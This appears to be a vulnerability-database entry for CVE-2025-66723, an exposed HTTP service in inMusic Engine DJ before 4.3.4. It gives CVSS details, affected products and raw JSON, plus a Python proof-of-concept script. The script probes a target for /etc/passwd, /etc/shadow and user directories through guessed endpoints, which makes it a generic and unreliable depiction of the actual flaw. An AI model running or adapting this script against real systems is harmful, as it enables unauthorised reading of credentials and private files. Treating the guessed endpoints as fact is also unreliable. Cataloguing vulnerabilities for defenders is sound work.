Security Vulnerability Report
中文
CVE-2025-66723 CVSS 7.5 HIGH

CVE-2025-66723

Published: 2025-12-30 21:15:44
Last Modified: 2026-01-05 20:25:53
Source: [email protected]

Description

inMusic Brands Engine DJ before 4.3.4 suffers from Insecure Permissions due to exposed HTTP service in the Remote Library, which allows attackers to access all files and network paths.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:inmusicbrands:engine_dj_desktop:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
inMusic Brands Engine DJ < 4.3.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-66723 PoC - inMusic Engine DJ Insecure Permissions # Target: Engine DJ with exposed Remote Library HTTP service # Usage: python cve-2025-66723_poc.py <target_ip> <target_port> import requests import sys import argparse def exploit(target_ip, target_port=80): """ Exploit for CVE-2025-66723 - Engine DJ Insecure Permissions This PoC demonstrates how an unauthenticated attacker can access arbitrary files on the target system through the exposed HTTP service. """ base_url = f"http://{target_ip}:{target_port}" # Test connection and identify the service print(f"[*] Testing connection to {base_url}") try: response = requests.get(base_url, timeout=10) print(f"[+] Service detected: {response.headers.get('Server', 'Unknown')}") except requests.exceptions.RequestException as e: print(f"[-] Connection failed: {e}") return False # List of sensitive files to attempt to read sensitive_paths = [ "/etc/passwd", # Unix/Linux password file "/etc/shadow", # Unix/Linux shadow password file "C:\\Windows\\System32\\drivers\\etc\\hosts", # Windows hosts file "/home/", # Home directories "C:\\Users\\", # Windows user directories ] print("[*] Attempting to access sensitive files...") for path in sensitive_paths: try: # Try different endpoint patterns endpoints = [ f"{base_url}/file?path={path}", f"{base_url}/read?file={path}", f"{base_url}/download?path={path}", f"{base_url}/files{path}", ] for endpoint in endpoints: response = requests.get(endpoint, timeout=10) if response.status_code == 200 and len(response.content) > 0: print(f"[+] SUCCESS: Accessed {path}") print(f"[+] Content preview: {response.text[:200]}...") return True except Exception as e: continue print("[-] Could not access files with common patterns") print("[*] Manual testing may be required") return False if __name__ == "__main__": parser = argparse.ArgumentParser(description='CVE-2025-66723 PoC') parser.add_argument('target_ip', help='Target IP address') parser.add_argument('target_port', type=int, default=80, help='Target port (default: 80)') args = parser.parse_args() print("=" * 60) print("CVE-2025-66723 - inMusic Engine DJ Insecure Permissions") print("=" * 60) exploit(args.target_ip, args.target_port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66723", "sourceIdentifier": "[email protected]", "published": "2025-12-30T21:15:44.120", "lastModified": "2026-01-05T20:25:53.490", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "inMusic Brands Engine DJ before 4.3.4 suffers from Insecure Permissions due to exposed HTTP service in the Remote Library, which allows attackers to access all files and network paths."}, {"lang": "es", "value": "Engine DJ de inMusic Brands anterior a la versión 4.3.4 sufre de permisos inseguros debido a un servicio HTTP expuesto en la Biblioteca Remota, lo que permite a los atacantes acceder a todos los archivos y rutas de red."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-732"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:inmusicbrands:engine_dj_desktop:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.0.0", "versionEndExcluding": "4.3.4", "matchCriteriaId": "4C15331C-08E6-4BB8-86B9-8FEB87EA8B0E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://github.com/audiopump/cve-2025-66723", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.inmusicbrands.com/", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.